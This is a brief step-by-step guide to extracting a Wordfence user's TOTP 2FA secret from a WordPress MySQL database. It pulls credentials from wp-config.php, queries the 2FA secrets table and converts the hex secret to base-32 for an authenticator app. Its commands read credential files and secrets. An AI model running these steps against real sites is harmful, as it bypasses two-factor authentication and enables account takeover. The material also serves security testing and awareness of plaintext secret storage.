Wordfence is a Wordpress plugin used to protect against automated attacks. Provided with access to MySQL (and MySQL credentials), you can recover the TOTP secret for an account. As discussed in this blog post, Wordfence stores 2FA secrets in plain-text (technically in binary, in a MySQL table). This still works as of Wordfence 8.0.3, but you can check the TOTP source code to see if additional security has been added.

1. Obtain the database credentials. This can be found in wp-config.php in the WP root. You want $table_prefix (if multiple WP installs), DB_NAME, DB_USER, and DB_PASSWORD. DB_HOST is assumed to be localhost.

2. Connect to the database:

   $ mysql $DB_HOST --user=$DB_USER --password=$DB_PASSWORD

3. Orient yourself using SHOW TABLES;. You should see tables starting with $table_prefix.

4. Obtain the desired $USER_ID from the output of:

   mysql> SELECT * FROM ${table_prefix}_users

5. Copy the $TOTP_SECRET (the hex representation of the secret) from the output of:

   mysql> SELECT HEX(secret) from ${table_prefix}_wfls_2fa_secrets WHERE id = $USER_ID;
   

6. Convert to base-32 using Python:

   >>> base64.b32encode(bytearray.fromhex("$TOTP_SECRET")).decode('utf-8')

7. Stick the secret in your favorite authenticator application.